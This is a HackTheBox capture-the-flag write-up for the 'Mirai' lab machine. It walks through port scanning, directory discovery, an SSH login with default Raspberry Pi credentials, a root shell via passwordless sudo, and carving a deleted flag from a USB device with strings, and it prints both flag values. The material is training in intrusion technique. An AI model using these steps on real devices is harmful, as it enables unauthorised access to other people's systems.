Post

HackTheBox Mirai

Writeup for HackTheBox Mirai

Posted Updated
By Edwin Tok
3 min read
HackTheBox Mirai

Machine Synopsis

Mirai demonstrates one of the fastest-growing attack vectors in modern times; improperly configured IoT devices. This attack vector is constantly on the rise as more and more IoT devices are being created and deployed around the globe, and is actively being exploited by a wide variety of botnets. Internal IoT devices are also being used for long-term persistence by malicious actors. (Source)

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

$ nmap -sC -sV -A 10.10.10.48

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35

Trying to view the webpage leads us to a web page error.

website_error

Let’s add the hostname mirai.htb to the /etc/hosts file.

Accessing the webpage now shows that it is blocked.

website_blocked

Used dirsearch to check if there is any hidden directories.

1
2
3
4

$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
...
[21:05:29] 301 -    0B  - /admin  ->  http://mirai.htb/admin/
...

Navigating to /admin shows the following webpage.

website

The website seems like a dashboard to a Raspberry Pi.

Exploitation

Trying to login with the default password raspberry didn’t work. However, SSH using the default credentials pi:raspberyy worked.

1
2
3

$ ssh pi@10.10.10.48               
pi@10.10.10.48's password: 
pi@raspberrypi:~ $

Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

pi@raspberrypi:~ $ ls
background.jpg  Documents  Music         Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# ls
background.jpg	Documents  Music	 Pictures  python_games  Videos
Desktop		Downloads  oldconffiles  Public    Templates
root@raspberrypi:/home/pi# cd Desktop/
root@raspberrypi:/home/pi/Desktop# ls
Plex  user.txt
root@raspberrypi:/home/pi/Desktop# cat user.txt
ff837707441b257a20e32199d7c8838d
root@raspberrypi:/home/pi/Desktop# find ~/ -name root.txt
/root/root.txt
root@raspberrypi:/home/pi/Desktop# cat /root/root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

It seems like the root flag is not there but there is a hint that it’s in a USB file system. We can use df to view the summary of file systems.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

root@raspberrypi:~# df
Filesystem     1K-blocks    Used Available Use% Mounted on
aufs             8856504 2839864   5543708  34% /
tmpfs             102396    4892     97504   5% /run
/dev/sda1        1354528 1354528         0 100% /lib/live/mount/persistence/sda1
/dev/loop0       1267456 1267456         0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs             255988       0    255988   0% /lib/live/mount/overlay
/dev/sda2        8856504 2839864   5543708  34% /lib/live/mount/persistence/sda2
devtmpfs           10240       0     10240   0% /dev
tmpfs             255988       8    255980   1% /dev/shm
tmpfs               5120       4      5116   1% /run/lock
tmpfs             255988       0    255988   0% /sys/fs/cgroup
tmpfs             255988       8    255980   1% /tmp
/dev/sdb            8887      93      8078   2% /media/usbstick
tmpfs              51200       0     51200   0% /run/user/999
tmpfs              51200       0     51200   0% /run/user/1000

There is a filesystem mounted on /media/usbstick.

1
2
3
4
5
6
7
8

root@raspberrypi:/# cd media/usbstick
root@raspberrypi:/media/usbstick# ls
damnit.txt  lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Now it seems like the flag is deleted from the filesystem. Turns out we can find the root flag using strings.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
HackTheBox
linux
This post is licensed under CC BY 4.0 by the author.